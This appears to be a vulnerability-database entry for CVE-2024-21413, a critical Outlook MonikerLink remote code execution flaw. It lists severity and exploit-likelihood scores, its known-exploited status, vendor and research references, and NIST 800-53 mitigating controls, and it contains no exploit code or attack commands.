CVE-2024-21413
Published: 13 February 2024
Summary
CVE-2024-21413 is a critical-severity Improper Input Validation (CWE-20) vulnerability in Microsoft Office 2016. Its CVSS base score is 9.8 (Critical).
Operationally, ranked in the top 0.2% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-2 (Flaw Remediation) and SI-10 (Information Input Validation).
Deeper analysis
Microsoft Outlook contains a remote code execution vulnerability, CVE-2024-21413, that arises from improper input validation (CWE-20) in the handling of MonikerLink objects. The flaw affects the Microsoft Outlook email client and received a CVSS 3.1 score of 9.8, reflecting network-accessible attack vectors that require neither authentication nor user interaction.
An unauthenticated remote attacker can exploit the issue by delivering a crafted message or link that triggers code execution, resulting in complete loss of confidentiality, integrity, and availability on the affected system.
Microsoft has published official guidance and patches through its security update guide at msrc.microsoft.com. Additional technical analysis from Check Point Research describes the underlying moniker-link mechanism, while Vicarius has released corresponding detection and mitigation scripts.
The EPSS score currently stands at 0.9296 with a recorded peak of 0.9350.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-19122
Vulnerability details
Microsoft Outlook Remote Code Execution Vulnerability
- CWE(s)
- KEV Date Added
- 06 February 2025
Related Threats
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly requires timely application of the vendor patches referenced in the MSRC advisory to eliminate the RCE flaw before exploitation.
Addresses the CWE-20 root cause by enforcing validation of untrusted input (e.g., email content) that the flaw fails to perform.
Requires integrity verification of software and incoming information to block or detect unauthorized code execution attempts via Outlook.